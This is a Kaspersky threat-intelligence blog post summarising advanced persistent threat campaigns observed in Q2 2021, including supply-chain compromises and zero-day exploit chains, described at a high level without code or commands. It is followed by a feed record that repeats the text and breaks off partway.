APT trends report Q2 2021

2021-07-29T10:00:46

Description

![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/12083054/green_digits_abstract-990x400.jpg) For more than four years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of. This is our latest installment, focusing on activities that we observed during Q2 2021. Readers who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>). ## The most remarkable findings Investigating the recent Microsoft Exchange vulnerabilities we and our colleagues from AMR found an attacker deploying a previously unknown backdoor, "FourteenHi", in a campaign that we dubbed ExCone, active since mid-March. During our investigation we revealed multiple tools and variants of FourteenHi, configured with infrastructure that FireEye reported as being related to the UNC2643 activity cluster. Moreover, we saw ShadowPad detections coincide with FourteenHi variant infections, possibly hinting at a shared operator between these two malware families. FourteenHi abuses the popular VLC media player to execute its loader. It is capable of performing basic backdoor functions. Further investigation also revealed scripts used by the actor to gain situational awareness post-exploitation, as well as previous use of the infrastructure to operate Cobalt Strike Beacon. Although we couldn't directly attribute this activity to any known threat actor, we found older, highly similar 64-bit samples of the backdoor used in close proximity with ShadowPad malware, mostly known for its operations involving supply-chain attacks as an infection vector. Notably, we also found one C2 IP used in a 64-bit sample reportedly used in the UNC2643 activity set, associated with the HAFNIUM threat actor, also using Cobalt Strike, DLL side-loading and exploiting the same Exchange vulnerabilities. ## Russian-speaking activity On May 27 and 28, details regarding an ongoing email campaign against diplomatic entities throughout Europe and North America were released by Volexity and Microsoft. These attacks were attributed to Nobelium and APT29 by Microsoft and Volexity respectively. While we were able to verify the malware and possible targeting for this cluster of activity, we haven't been able to make a definitive assessment at this time about which threat actor is responsible, although we found ties to Kazuar. We have designated it as a new threat actor and named it "HotCousin". The attacks began with a spear-phishing email which led to an ISO file container being stored on disk and mounted. From here, the victim was presented with a LNK file made to look like a folder within an Explorer window. If the victim double clicked on it, the LNK then executed a loader written in .NET referred to as BoomBox, or a DLL. The execution chain ultimately ended with a Cobalt Strike beacon payload being loaded into memory. According to public blogs, targeting was widespread but focused primarily on diplomatic entities throughout Europe and North America: based on the content of the lure documents bundled with the malware, this assessment appears to be accurate. This cluster of activity was conducted methodically beginning in January with selective targeting and slow operational pace, then ramping up and ending in May. There are indications of previous activity from this threat actor dating back to at least October 2020, based on other Cobalt Strike payloads and loaders bearing similar toolmarks. ## Chinese-speaking activity While investigating a recent rise of attacks against Exchange servers, we noticed a recurring cluster of activity that appeared in several distinct compromised networks. This cluster stood out because it used a formerly unknown Windows kernel mode rootkit and a sophisticated multi-stage malware framework aimed at providing remote control over the attacked servers. The former is used to hide the user mode malware's artefacts from investigators and security solutions, while demonstrating an interesting loading scheme involving the kernel mode component of an open source project named "Cheat Engine" to bypass the Windows Driver Signature Enforcement mechanism. We were able to determine that this toolset had been in use from as early as July 2020; and that the threat actor was mostly focused on Southeast Asian targets, including several governmental entities and telecoms companies. Since this was a long-standing operation, with high-profile victims, an advanced toolset and no affinity to a known threat actor, we decided to name the underlying cluster "GhostEmperor". APT31 (aka ZIRCONIUM) is a Chinese-speaking intrusion set. This threat actor set up an ORB (Operational Relay Boxes) infrastructure, composed of several compromised SOHO routers, to target entities based in Europe (and perhaps elsewhere). As of the publication of our report in May, we had seen these ORBs used to relay Cobalt Strike communications and for anonymization proxying purposes. It is likely that APT31 uses them for other implants and ends as well (for example, exploit or malware staging). Most of the infrastructure put in place by APT31 comprises compromised Pakedge routers (RK1, RE1 and RE2). This little-known constructor specializes in small enterprise routers and network devices. So far, we don't know which specific vulnerability has been exploited by the intrusion set to compromise the routers. Nor do we currently possess telemetry that would provide further visibility into this campaign. We will, of course, continue to track these activities. Following our previous report on EdwardsPheasant, DomainTools and BitDefender published articles about malicious activities against targets in Southeast Asia which we believe, with medium to high confidence, are parts of EdwardsPheasant campaigns. While tracking the activities of this threat actor, analyzing samples discovered or provided by third parties, and investigating from public IoCs, we discovered an updated DropPhone implant, an additional implant loaded by FoundCore's shellcode, several possible new infection documents and malicious domain names, as well as additional targets. While we do not believe we have a complete picture of this set of activities yet, our report this quarter marks a significant step further in understanding its extent. A Chinese-speaking APT compromised a certificate authority in Mongolia and replaced digital certificate management client software with a malicious downloader in February. We are tracking this group as BountyGlad. Related infrastructure was identified and used in multiple other incidents: interesting related activity included server-side attacks on WebSphere and WebLogic services in Hong Kong; and on the client-side, Trojanized Flash Player installers. The group demonstrated an increase in strategic sophistication with this supply-chain attack. While replacing a legitimate installer on a high value website like a certificate authority requires a medium level of skill and coordination, the technical sophistication is not on par with ShadowHammer. And while the group deploys fairly interesting, but simplistic, steganography to cloak its shellcode, we think it was probably generated with code that has been publicly available for years. Previous activity also connected with this group relied heavily on spear-phishing and Cobalt Strike throughout 2020. Some activity involved PowerShell commands and loader variants different from the downloaders presented in our recent report. In addition to spear-phishing, the group appears to rely on publicly available exploits to penetrate unpatched target systems. They use implants and C2 (Command and Control) code that are a mix of both publicly available and privately shared across multiple Chinese-speaking APTs. We are able to connect infrastructure across multiple incidents. Some of those were focused on Western targets in 2020. Some of the infrastructure listed in an FBI Flash alert published in May 2020, targeting US organizations conducting COVID-19 research, was also used by BountyGlad. While investigating users infected with the TPCon backdoor, previously discussed in a private report, we detected loaders which are part of a new multi-plugin malware framework that we named "QSC", which allows attackers to load and run plugins in-memory. We attribute the use of this framework to Chinese-speaking groups, based on some overlaps in victimology and infrastructure with other known tools used by these groups. We have so far observed the malware loading a Command shell and File Manager plugins in-memory. We believe the framework has been used in the wild since April 2020, based on the compilation timestamp of the oldest sample found. However, our telemetry suggests that the framework is still in use: the latest activity we detected was in March this year. Earlier this month, Rostelecom Solar and NCIRCC issued a joint public report describing a series of attacks against networks of government entities in Russia. The report described a formerly unknown actor leveraging an infection chain that leads to the deployment of two implants - WebDav-O and Mail-O. Those, in conjunction with other post-exploitation activity, have led to network-wide infections in the targeted organizations that resulted in exfiltration of sensitive data. We were able to trace the WebDav-O implant's activity in our telemetry to at least 2018, indicating government affiliated targets based in Belarus. Based on our investigation, we were able to find additional variants of the malware and observe some of the commands executed by the attackers on the compromised machines. We discovered a cluster of activity targeting telecom operators within a specific region. The bulk of this activity took place from May to October 2020. This activity made use of several malware families and tools; but the infrastructure, a staging directory, and in-country target profiles tie them together. The actors deployed a previously unknown passive backdoor, that we call "TPCon", as a primary implant. It was later used to perform both reconnaissance within target organizations and to deploy a post-compromise toolset made up mostly of publicly available tools. We also found other previously unknown active backdoors, that we call "evsroin", used as secondary implants. Another interesting find was a related loader (found in a staging directory) that loaded a KABA1 implant variant. KABA1 was an implant used against targets throughout the South China Sea that we attributed to the Naikon APT back in 2016. On another note, on the affected hosts we found additional multiple malware families shared by Chinese-speaking actors, such as ShadowPad and Quarian backdoors. These did not seem to be directly connected to the TPCon/evsroin incidents because the supporting infrastructure appeared to be completely separate. One of the ShadowPad samples appears to have been detected in 2020, while the others were detected well before that, in 2019. Besides the Naikon tie, we found some overlaps with previously reported IceFog and IamTheKing activities. ## Middle East BlackShadow is a threat group that became known after exfiltrating sensitive documents from Shirbit, an Israeli insurance company, and demanding a ransom in exchange for not releasing the information in its possession. Since then, the group has made more headlines, breaching another company in Israel and publishing a trove of documents containing customer related information on Telegram. Following this, we found several samples of the group's unique .NET backdoor in our telemetry that were formerly unknown to us, one of which was recently detected in Saudi Arabia. By pivoting on new infrastructure indicators that we observed in those samples, we were able to find a particular C2 server that was contacted by a malicious Android implant and shows ties to the group's activity. We previously covered a WildPressure campaign against targets in the Middle East . Keeping track of the threat actor's malware this spring, we were able to find a newer version (1.6.1) of their C++ Trojan, a corresponding VBScript variant with the same version and a completely new set of modules, including an orchestrator and three plugins. This confirms our previous assumption that there are more last-stagers besides the C++ ones, based on one of the fields in the C2 communication protocol which contains the "client" programming language. Another language used by WildPressure is Python. The PyInstaller module for Windows contains a script named "Guard". Perhaps the most interesting finding here is that this malware was developed for both Windows and macOS operating systems. In this case, the hardcoded version is 2.2.1. The coding style, overall design and C2 communication protocol is quite recognisable across all programming languages used by the attackers. The malware used by WildPressure is still under active development in terms of versions and programming languages in use. Although we could not associate WildPressure's activity with other threat actors, we did find minor similarities in the TTPs (Tactics, Techniques and Procedures) used by BlackShadow, which is also active in the same region. However, we consider that these similarities serve as minor ties and are not enough to make any attribution. We discovered an ongoing campaign that we attribute to an actor named WIRTE, beginning in late 2019, targeting multiple sectors, focused on the Middle East. WIRTE is a lesser-known threat actor first publicly referenced in 2019, which we suspect has relations with the Gaza Cybergang threat actor group. During our hunting efforts, in February, for threat actor groups that are using VBS/VBA implants, we came across MS Excel droppers that use hidden spreadsheets and VBA macros to drop their first stage implant - a VBS script. The VBS script's main function is to collect system information and execute arbitrary code sent by the attackers. Although we recently reported on a new Muddywater first stage VBS implant used for reconnaissance and profiling activities, these intrusion sets have slightly different TTPs and wider targeting. To date, we have recorded victims focused in the Middle East and a few other countries outside this region. Despite various industries being affected, the focus was mainly towards government and diplomatic entities; however, we also noticed an unusual targeting of law firms. GoldenJackal is the name we have given to a cluster of activity, recently discovered in our telemetry, that has been active since November 2019. This intrusion set consists of a set of .NET-based implants that are intended to control victim machines and exfiltrate certain files from them, suggesting that the actor's primary motivation is espionage. Furthermore, the implants were found in a restricted set of machines associated with diplomatic entities in the Middle East. Analysis of the aforementioned malware, as well as the accompanied detection logs, portray a capable and moderately stealthy actor. This can be substantiated by the successful foothold gained by the underlying actor in the few organizations we came across, all the while keeping a low signature and ambiguous footprint. ## Southeast Asia and Korean Peninsula The ScarCruft group is a geo-political motivated APT group that usually attacks government entities, diplomats and individuals associated with North Korean affairs. Following our last report about this group, we had not seen its activities for almost a year. However, we observed that ScarCruft compromised a North Korea-related news media website in January, beginning a campaign that was active until March. The attackers utilized the same exploit chains, CVE-2020-1380 and CVE-2020-0986, also used in [Operation Powerfall](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>). Based on the exploit code and infection scheme characteristics, we suspect that Operation PowerFall has a connection with the ScarCruft group. The exploit chain contains several stages of shellcode execution, finally deploying a Windows executable payload in memory. We discovered several victims from South Korea and Singapore. Besides this watering-hole attack, this group also used Windows executable malware concealing its payload. This malware, dubbed "ATTACK-SYSTEM", also used multi-stage shellcode infection to deliver the same final payload named "BlueLight". BlueLight uses OneDrive for C2. Historically, ScarCruft malware, especially RokRat, took advantage of personal cloud servers as C2 servers, such as pCloud, Box, Dropbox, and Yandex. In May 2020, the Criminal Investigation Bureau (CIB) of Taiwan published an announcement about an attack targeting Taiwanese legislators. Based on their information, an unknown attacker sent spear-phishing emails using a fake presidential palace email account, delivering malware we dubbed "Palwan". Palwan is malware capable of performing basic backdoor functionality as well as downloading further modules with additional capabilities. Analysing the malware, we discovered another campaign, active in parallel, targeting Nepal. We also found two more waves of attacks launched against Nepal in October 2020 and in January this year using Palwan malware variants. We suspect that the targeted sector in Nepal is similar to the one reported by the CIB of Taiwan. Investigating the infrastructure used in the Nepal campaigns, we spotted an overlap with Dropping Elephant activity. However, we don't deem this overlap sufficient to attribute this activity to the Dropping Elephant threat actor. BlueNoroff is a long-standing, financially motivated APT group that has been targeting the financial industry for years. In recent operations, the group has focused on cryptocurrency businesses. Since the publication of our research of BlueNoroff's "SnatchCrypto" campaign in 2020, the group's strategy to deliver malware has evolved. In this campaign, BlueNoroff used a malicious Word document exploiting CVE-2017-0199, a remote template injection vulnerability. The injected template contains a Visual Basic script, which is responsible for decoding the next payload from the initial Word document and injecting it into a legitimate process. The injected payload creates a persistent backdoor on the victim's machine. We observed several types of backdoor. For further surveillance of the victim, the malware operator may also deploy additional tools. BlueNoroff has notably set up fake blockchain, or cryptocurrency-related, company websites for this campaign, to lure potential victims and initiate the infection process. Numerous decoy documents were used, which contain business and nondisclosure agreements as well as business introductions. When compared to the previous SnatchCrypto campaign, the BlueNoroff group utilized a similar backdoor and PowerShell agent but changed the initial infection vector. Windows shortcut files attached to spear-phishing emails used to be the starting point for an infection: they have now been replaced by weaponized Word documents. We have discovered [Andariel activity](<https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/>) using a revised infection scheme and custom ransomware targeting a broad spectrum of industries located in South Korea. In April, we observed a suspicious document containing a Korean file name and decoy uploaded to VirusTotal. It revealed a novel infection scheme and an unfamiliar payload. During the course of our research, Malwarebytes published a report with technical details about the same series of attacks, which attributed it to the Lazarus group. After a deep analysis we reached a different conclusion - that the Andariel group was behind these attacks. Code overlaps between the second stage payload in this campaign and previous malware from the Andariel group allowed for this attribution. Apart from the code similarity and the victimology, we found additional connections with the Andariel group. Each threat actor has a characteristic habit when they interactively work with a backdoor shell in the post-exploitation phase. The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity. The threat actor has been spreading the third stage payload since the middle of 2020 and leveraged malicious Word documents and files mimicking PDF documents as infection vectors. Notably, in addition to the final backdoor, we discovered one victim infected with custom ransomware. This ransomware adds another facet to this Andariel campaign, which also sought financial profit in a previous operation involving the compromise of ATMs. We recently uncovered a large-scale and highly active attack in Southeast Asia coming from a threat actor we dubbed [LuminousMoth](<https://securelist.com/apt-luminousmoth/103332/>). Further analysis revealed that this malicious activity dates back to October 2020 and was still ongoing at the time we reported it in June. LuminousMoth takes advantage of DLL sideloading to download and execute a Cobalt Strike payload. However, perhaps the most interesting part of this attack is its capability to spread to other hosts by infecting USB drives. In addition to the malicious DLLs, the attackers also deployed a signed, but fake version of the popular application Zoom on some infected systems, enabling them to exfiltrate files; and an additional tool that accesses a victim's Gmail session by stealing cookies from the Chrome browser. Infrastructure ties as well as shared TTPs allude to a possible connection between LuminousMoth and the HoneyMyte threat group, which was seen targeting the same region and using similar tools in the past. Most early sightings of this activity were in Myanmar, but it now appears that the attackers are much more active in the Philippines, where the number of known attacks has grown more than tenfold. This raises the question of whether this is caused by a rapid replication through removable devices or by an unknown infection vector, such as a watering-hole focusing on the Philippines. We recently reported SideCopy campaigns attacking the Windows platform together with Android-based implants. These implants turned out to be multiple applications working as information stealers to collect sensitive information from victims' devices, such as contact lists, SMS messages, call recordings, media and other types of data. Following up, we discovered additional malicious Android applications, some of them purporting to be known messaging apps like Signal or an adult chat platform. These newly discovered applications use the Firebase messaging service as a channel to receive commands. The operator is able to control if either Dropbox or another, hard coded server is used to exfiltrate stolen files. ## Other interesting discoveries Expanding our research on the exploit targeting CVE-2021-1732, originally discovered by DBAPPSecurity Threat Intelligence Center and used by the Bitter APT group, [we discovered another possible zero-day exploit used in the Asia-Pacific (APAC) region](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>). Interestingly, the exploit was found in the wild as part of a separate framework, alongside CVE-2021-1732 as well as other previously patched exploits. We are highly confident that this framework is entirely unrelated to Bitter APT and was used by a different threat actor. Further analysis revealed that this Escalation of Privilege (EoP) exploit has potentially been used in the wild since at least November 2020. Upon discovery, we reported this new exploit to Microsoft in February. After confirmation that we were indeed dealing with a new zero-day, it received the designation CVE-2021-28310. Various marks and artifacts left in the exploit mean that we are also highly confident that CVE-2021-1732 and CVE-2021-28310 were created by the same exploit developer that we track as "Moses". "Moses" appears to be an exploit developer who makes exploits available to several threat actors, based on other past exploits and the actors observed using them. To date, we have confirmed that at least two known threat actors have utilized exploits originally developed by Moses: Bitter APT and Dark Hotel. Based on similar marks and artifacts, as well as privately obtained information from third parties, we believe at least six vulnerabilities observed in the wild in the last two years have originated from "Moses". While the EoP exploit was discovered in the wild, we are currently unable to directly tie its usage to any known threat actor that we are currently tracking. The EoP exploit was probably chained together with other browser exploits to escape sandboxes and obtain system level privileges for further access. Unfortunately, we weren't able to capture a full exploit chain, so we don't know if the exploit is used with another browser zero-day, or coupled with exploits taking advantage of known, patched vulnerabilities. In another, more recent investigation into the surge of attacks by APT actors against Exchange servers following the revelation of ProxyLogon and other Exchange vulnerabilities, we took note of one unique cluster of activity. It attracted our attention because the actor behind it seemed to have been active in compromising Exchange servers since at least December 2020, all the while using a toolset that we were not able to associate with any known threat group. During March, several waves of attacks on Exchange servers were made public, partially describing the same cluster of activity that we had observed. One of them, reported by ESET, contained an assessment that the actor behind this activity had access to the Exchange exploits prior to their public release, which aligns with our observations of the early activity of it last year. That said, none of the public accounts described sightings of the full infection chain and later stages of malware deployed as part of this group's operation. Adopting the name Websiic, given publicly to this cluster of activity by ESET, we reported the TTPs of the underlying threat actor. Namely, we focused on the usage of both commodity tools like the China Chopper webshell and a proprietary .NET backdoor used by the group, which we dubbed "Samurai", as well as describing a broader set of targets than the one documented thus far. On 15 April, Codecov publicly disclosed that its Bash Uploader script had been compromised and was distributed to users between the 31 January and the 1 April. The Bash Uploader script is publicly distributed by Codecov and aims to gather information on the user's execution environments, collect code coverage reports, and send them to the Codecov infrastructure. As a result, this script compromise effectively constitutes a supply-chain attack. The Bash uploader script is typically executed as a trusted resource in development and testing environments (including as part of automated build processes, such as continuous integration or development pipelines); and its compromise could enable malicious access to infrastructure or account secrets, as well as code repositories and source code. While we haven't been able to confirm the malicious script deployment, retrieve any information on the compromise goals, or identify further associated malicious tools yet, we were able to collect one sample of a compromised Bash uploader script, as well as identify some possibly associated additional malicious servers. An e-mail sent by Click Studios to its customers on 22 April informed them that a sophisticated threat actor had gained access to the Passwordstate automatic updating functionality, referred to as the in-place upgrade. Passwordstate is a password management tool for enterprises, and on 20 April, for a period of about 28 hours, a malicious DLL was included in the software updates. On 24 April, an incident management advisory was also released. The purpose of the campaign was to steal passwords stored in the password manager. Although this attack was only active for a short time, we managed to obtain the malicious DLLs and reported our initial findings. Nevertheless, it's still unclear how the attackers gained access to the Passwordstate software to begin with. Following a new advisory published by Click Studio on 28 April, we discovered a new variant of the malicious DLL used to backdoor the Passwordstate password manager. This DLL variant was distributed in a phishing campaign, most likely by the same actor. A few days after April's Patch Tuesday updates from Microsoft (13 April), a number of suspicious files caught our attention. These files were binaries, disguised as "April 2021 Security Update Installers". They were signed with a valid digital signature, delivering Cobalt Strike beacon modules. It is likely that the modules were signed with a stolen digital certificate. These Cobalt Strike beacon implants were configured with a hardcoded C2, "code.microsoft.com". Contrary to a (now redacted) publication from the Qihoo 360 team revolving around this activity, we can confirm that there was no compromise of Microsoft's infrastructure. In fact, an unauthorized party took over the dangling subdomain "code.microsoft.com" and configured it to resolve to their Cobalt Strike host, setup around 15 April. That domain hosted a Cobalt Strike beacon payload served to HTTP clients using a specific and unique user agent. According to Microsoft and the initial Qihoo notification, the impact in this case was very limited and didn't affect unsuspecting visitors to this website because of the required unique user agent. On April 14-15, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits. While we were not able to retrieve the exploit used for Remote Code Execution (RCE) in the Chrome web-browser, we were able to find and analyze an Escalation of Privilege (EoP) exploit used to escape the sandbox and obtain system privileges. The EoP exploit was fine-tuned to work against the latest and the most prominent builds of Windows 10 (17763 - RS5, 18362 - 19H1, 18363 - 19H2, 19041 - 20H1, 19042 - 20H2) and it exploits two distinct vulnerabilities in the Microsoft Windows OS kernel. On April 20, we reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the Information Disclosure vulnerability and CVE-2021-31956 to the EoP vulnerability. Both vulnerabilities were patched on June 8, as a part of the June Patch Tuesday. The exploit-chain attempts to install malware in the system through a dropper. The malware starts as a system service and loads the payload, a "remote shell"-style backdoor which in turns connects to the C2 to get commands. So far, we haven't been able to find any connections or overlaps with a known actor. Therefore, we are tentatively calling this cluster of activity [PuzzleMaker](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>). On April 16, we began hearing rumors about active exploitation of Pulse Secure devices from other researchers in the community. One day prior to this, the NSA, CISA, and FBI had jointly published an advisory stating that APT29 was conducting widespread scanning and exploitation of vulnerable systems, including Pulse Secure. For this reason, initial thoughts were that the two were related; and these were just rumors circulating the community about old activity that was being brought to light again. Following this, we were able to at least confirm that the initial rumors were part of a separate set of activities that had occurred between January and March and were not directly related to the advisory mentioned above. This new activity involved the exploitation of at least two vulnerabilities in Pulse Secure; one previously patched and one zero-day (CVE-2021-22893). We also became aware of affected organizations that were notified by a third party that they were potentially compromised by this activity. After exploitation, the threat actor proceeded to deploy a simple webshell to maintain persistence. On May 3, Pulse Secure delivered "out-of-cycle" update and workaround packages to provide a solution for the multiple vulnerabilities. Cooperating with Check Point Research, we discovered an ongoing attack targeting a small group of individuals in Xinjiang and Pakistan, in regions mostly populated by the Uyghur minority. The attackers used malicious executables that collect information about the infected system and attempt to download a second-stage payload. The actor put considerable effort into disguising the payloads, whether by creating delivery documents that appear to be originating from the United Nations using up-to-date related themes, or by setting up websites for non-existing organizations claiming to fund charity groups. In our report, we examined the flow of both infection vectors and provided our analysis of the malicious artifacts we came across during this investigation, even though we were unable to obtain the later stages of the infection chain. ## Final thoughts While the TTPs of some threat actors remain consistent over time, relying heavily on social engineering as a means of gaining a foothold in a target organisation or compromising an individual's device, others refresh their toolsets and extend the scope of their activities. Our regular quarterly reviews are intended to highlight the key developments of APT groups. Here are the main trends that we've seen in Q2 2021: * We have reported several supply-chain attacks in recent months.. While some were major and have attracted worldwide attention, we observed equally successful low-tech attacks, such as BountyGlad, CoughingDown and the attack targeting Codecov. * APT groups mainly use social engineering to gain an initial foothold in a target network. However, we've seen a rise in APT threat actors leveraging exploits to gain that initial foothold - including the zero-days developed by the exploit developer we call "Moses" and those used in the PuzzleMaker, Pulse Secure attacks and the Exchange server vulnerabilities. * APT threat actors typically refresh and update their toolsets: this includes not only the inclusion of new platforms but also the use of additional languages as seen by WildPressure's macOS-supported Python malware. * As illustrated by the campaigns of various threat actors - including BountyGlad, HotCousin, GoldenJackal, Scarcruft, Palwan, Pulse Secure and the threat actor behind the WebDav-O/Mail-O implants - geo-politics continues to drive APT developments. As always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.

{"id": "SECURELIST:5147443B0EBD7DFCCB942AD0E2F92CCF", "type": "securelist", "bulletinFamily": "blog", "title": "APT trends report Q2 2021", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/12083054/green_digits_abstract-990x400.jpg)\n\nFor more than four years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q2 2021.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## The most remarkable findings\n\nInvestigating the recent Microsoft Exchange vulnerabilities we and our colleagues from AMR found an attacker deploying a previously unknown backdoor, "FourteenHi", in a campaign that we dubbed ExCone, active since mid-March. During our investigation we revealed multiple tools and variants of FourteenHi, configured with infrastructure that FireEye reported as being related to the UNC2643 activity cluster. Moreover, we saw ShadowPad detections coincide with FourteenHi variant infections, possibly hinting at a shared operator between these two malware families.\n\nFourteenHi abuses the popular VLC media player to execute its loader. It is capable of performing basic backdoor functions. Further investigation also revealed scripts used by the actor to gain situational awareness post-exploitation, as well as previous use of the infrastructure to operate Cobalt Strike Beacon.\n\nAlthough we couldn't directly attribute this activity to any known threat actor, we found older, highly similar 64-bit samples of the backdoor used in close proximity with ShadowPad malware, mostly known for its operations involving supply-chain attacks as an infection vector. Notably, we also found one C2 IP used in a 64-bit sample reportedly used in the UNC2643 activity set, associated with the HAFNIUM threat actor, also using Cobalt Strike, DLL side-loading and exploiting the same Exchange vulnerabilities.\n\n## Russian-speaking activity\n\nOn May 27 and 28, details regarding an ongoing email campaign against diplomatic entities throughout Europe and North America were released by Volexity and Microsoft. These attacks were attributed to Nobelium and APT29 by Microsoft and Volexity respectively. While we were able to verify the malware and possible targeting for this cluster of activity, we haven't been able to make a definitive assessment at this time about which threat actor is responsible, although we found ties to Kazuar. We have designated it as a new threat actor and named it "HotCousin". The attacks began with a spear-phishing email which led to an ISO file container being stored on disk and mounted. From here, the victim was presented with a LNK file made to look like a folder within an Explorer window. If the victim double clicked on it, the LNK then executed a loader written in .NET referred to as BoomBox, or a DLL. The execution chain ultimately ended with a Cobalt Strike beacon payload being loaded into memory. According to public blogs, targeting was widespread but focused primarily on diplomatic entities throughout Europe and North America: based on the content of the lure documents bundled with the malware, this assessment appears to be accurate. This cluster of activity was conducted methodically beginning in January with selective targeting and slow operational pace, then ramping up and ending in May. There are indications of previous activity from this threat actor dating back to at least October 2020, based on other Cobalt Strike payloads and loaders bearing similar toolmarks.\n\n## Chinese-speaking activity\n\nWhile investigating a recent rise of attacks against Exchange servers, we noticed a recurring cluster of activity that appeared in several distinct compromised networks. This cluster stood out because it used a formerly unknown Windows kernel mode rootkit and a sophisticated multi-stage malware framework aimed at providing remote control over the attacked servers. The former is used to hide the user mode malware's artefacts from investigators and security solutions, while demonstrating an interesting loading scheme involving the kernel mode component of an open source project named "Cheat Engine" to bypass the Windows Driver Signature Enforcement mechanism. We were able to determine that this toolset had been in use from as early as July 2020; and that the threat actor was mostly focused on Southeast Asian targets, including several governmental entities and telecoms companies. Since this was a long-standing operation, with high-profile victims, an advanced toolset and no affinity to a known threat actor, we decided to name the underlying cluster "GhostEmperor".\n\nAPT31 (aka ZIRCONIUM) is a Chinese-speaking intrusion set. This threat actor set up an ORB (Operational Relay Boxes) infrastructure, composed of several compromised SOHO routers, to target entities based in Europe (and perhaps elsewhere). As of the publication of our report in May, we had seen these ORBs used to relay Cobalt Strike communications and for anonymization proxying purposes. It is likely that APT31 uses them for other implants and ends as well (for example, exploit or malware staging). Most of the infrastructure put in place by APT31 comprises compromised Pakedge routers (RK1, RE1 and RE2). This little-known constructor specializes in small enterprise routers and network devices. So far, we don't know which specific vulnerability has been exploited by the intrusion set to compromise the routers. Nor do we currently possess telemetry that would provide further visibility into this campaign. We will, of course, continue to track these activities.\n\nFollowing our previous report on EdwardsPheasant, DomainTools and BitDefender published articles about malicious activities against targets in Southeast Asia which we believe, with medium to high confidence, are parts of EdwardsPheasant campaigns. While tracking the activities of this threat actor, analyzing samples discovered or provided by third parties, and investigating from public IoCs, we discovered an updated DropPhone implant, an additional implant loaded by FoundCore's shellcode, several possible new infection documents and malicious domain names, as well as additional targets. While we do not believe we have a complete picture of this set of activities yet, our report this quarter marks a significant step further in understanding its extent.\n\nA Chinese-speaking APT compromised a certificate authority in Mongolia and replaced digital certificate management client software with a malicious downloader in February. We are tracking this group as BountyGlad. Related infrastructure was identified and used in multiple other incidents: interesting related activity included server-side attacks on WebSphere and WebLogic services in Hong Kong; and on the client-side, Trojanized Flash Player installers. The group demonstrated an increase in strategic sophistication with this supply-chain attack. While replacing a legitimate installer on a high value website like a certificate authority requires a medium level of skill and coordination, the technical sophistication is not on par with ShadowHammer. And while the group deploys fairly interesting, but simplistic, steganography to cloak its shellcode, we think it was probably generated with code that has been publicly available for years. Previous activity also connected with this group relied heavily on spear-phishing and Cobalt Strike throughout 2020. Some activity involved PowerShell commands and loader variants different from the downloaders presented in our recent report. In addition to spear-phishing, the group appears to rely on publicly available exploits to penetrate unpatched target systems. They use implants and C2 (Command and Control) code that are a mix of both publicly available and privately shared across multiple Chinese-speaking APTs. We are able to connect infrastructure across multiple incidents. Some of those were focused on Western targets in 2020. Some of the infrastructure listed in an FBI Flash alert published in May 2020, targeting US organizations conducting COVID-19 research, was also used by BountyGlad.\n\nWhile investigating users infected with the TPCon backdoor, previously discussed in a private report, we detected loaders which are part of a new multi-plugin malware framework that we named "QSC", which allows attackers to load and run plugins in-memory. We attribute the use of this framework to Chinese-speaking groups, based on some overlaps in victimology and infrastructure with other known tools used by these groups. We have so far observed the malware loading a Command shell and File Manager plugins in-memory. We believe the framework has been used in the wild since April 2020, based on the compilation timestamp of the oldest sample found. However, our telemetry suggests that the framework is still in use: the latest activity we detected was in March this year.\n\nEarlier this month, Rostelecom Solar and NCIRCC issued a joint public report describing a series of attacks against networks of government entities in Russia. The report described a formerly unknown actor leveraging an infection chain that leads to the deployment of two implants - WebDav-O and Mail-O. Those, in conjunction with other post-exploitation activity, have led to network-wide infections in the targeted organizations that resulted in exfiltration of sensitive data. We were able to trace the WebDav-O implant's activity in our telemetry to at least 2018, indicating government affiliated targets based in Belarus. Based on our investigation, we were able to find additional variants of the malware and observe some of the commands executed by the attackers on the compromised machines.\n\nWe discovered a cluster of activity targeting telecom operators within a specific region. The bulk of this activity took place from May to October 2020. This activity made use of several malware families and tools; but the infrastructure, a staging directory, and in-country target profiles tie them together. The actors deployed a previously unknown passive backdoor, that we call "TPCon", as a primary implant. It was later used to perform both reconnaissance within target organizations and to deploy a post-compromise toolset made up mostly of publicly available tools. We also found other previously unknown active backdoors, that we call "evsroin", used as secondary implants. Another interesting find was a related loader (found in a staging directory) that loaded a KABA1 implant variant. KABA1 was an implant used against targets throughout the South China Sea that we attributed to the Naikon APT back in 2016. On another note, on the affected hosts we found additional multiple malware families shared by Chinese-speaking actors, such as ShadowPad and Quarian backdoors. These did not seem to be directly connected to the TPCon/evsroin incidents because the supporting infrastructure appeared to be completely separate. One of the ShadowPad samples appears to have been detected in 2020, while the others were detected well before that, in 2019. Besides the Naikon tie, we found some overlaps with previously reported IceFog and IamTheKing activities.\n\n## Middle East\n\nBlackShadow is a threat group that became known after exfiltrating sensitive documents from Shirbit, an Israeli insurance company, and demanding a ransom in exchange for not releasing the information in its possession. Since then, the group has made more headlines, breaching another company in Israel and publishing a trove of documents containing customer related information on Telegram. Following this, we found 